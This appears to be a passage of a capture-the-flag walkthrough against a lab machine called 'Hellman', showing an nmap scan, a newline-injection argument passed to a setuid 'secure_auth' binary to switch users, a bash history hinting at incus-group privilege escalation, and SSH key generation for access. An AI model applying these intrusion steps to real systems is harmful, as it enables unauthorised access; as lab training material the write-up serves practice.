┌──(root㉿kali)-[~] └─# nmap -sV -sC -A $IP -Pn Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-23 03:57 EST Nmap scan report for Hellman (192.168.31.109) Host is up (0.0012s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 10.0 (protocol 2.0) 80/tcp open http nginx |_http-title: Diffie-Hellman Challenge Guide MAC Address: 08:00:27:11:9B:89 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Device type: general purpose|router Running: Linux 4.X|5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 1 hop
TRACEROUTE HOP RTT ADDRESS 1 1.20 ms Hellman (192.168.31.109)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.14 seconds
Hellman:~$ /usr/bin/secure_auth sh "$(printf 'G\nx')" [+] Auth successful. Switching to UID 1002... ~ $ id uid=1002(water) gid=1002(water) groups=1001(god)
提权
检查 water 的历史记录
1 2 3 4 5 6 7 8 9 10 11
~ $ cd /home/water /home/water $ ls -al total 12 drwxr-sr-x 2 water water 4096 Jan 23 15:46 . drwxr-xr-x 4 root root 4096 Jan 23 15:45 .. -rw------- 1 water water 63 Jan 23 15:47 .ash_history /home/water $ cat .ash_history incus ls -l /var/lib/incus/unix.socket addgroup god incus exit
┌──(root㉿kali)-[~] └─# ssh-keygen -t rsa -f water_key Generating public/private rsa key pair. Enter passphrase for"water_key" (empty for no passphrase): Enter same passphrase again: Your identification has been saved in water_key Your public key has been saved in water_key.pub The key fingerprint is: SHA256:GTh7pSNVcigvB6HQP/txQTibanRsngzJkvI6vfjjTSo root@kali The key's randomart image is: +---[RSA 3072]----+ | .. ...oo | | ...o.++. | | .+o*o=. | | . o O+O=. | | o oo%S. . | | . +o=.. | | o ... o | | E.o+ . | | .==o. | +----[SHA256]-----+ ┌──(root㉿kali)-[~] └─# cat water_key.pub ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCsrbkrGLaPyxh8IrbFGmS4SYXnemawNEKUX0w9+aWOFRE25KX15DAzzajGwMylaVIMuEsJuSwSRCB6h8S/4Fyk58ebDDIQJDjefA59b/DEYXJhPrE+8LEqGEm1249/epPkSF6FQTYwnyESzUGkwkEcmSJFE5pIUrR+YsVGGQh5hByLPzSmwU33lRu6khwlvpZ5bHMAoCUjf6YTHE6kHl+XYYBWSPjUtGT+CpHFuX3sUVMGIpA0543OQS7FxJ8F74fAcgGjjFMrtJF1yo26adSGUIADvbyMG2ZCpClFlFyocXu+tlydjmzXyyZj+eugHkEV/RHKXGQmSVG1inG+kzA3NFxy/emWI2kWenpYRuEMHQZRDe6siYlkVPBzqOMe2HDHTF1C1W206V2XOUxrhh/P67yVpzDo+CSU1MN7+oP5sFpwtQvyRr9Mi6cvT9BvExbjtRawkQsabCJ6M1KK3/JG8aXhqsK+kklwQJTQFNo2o2FqRd/6Ok1rRKY+MAaGTyk= root@kali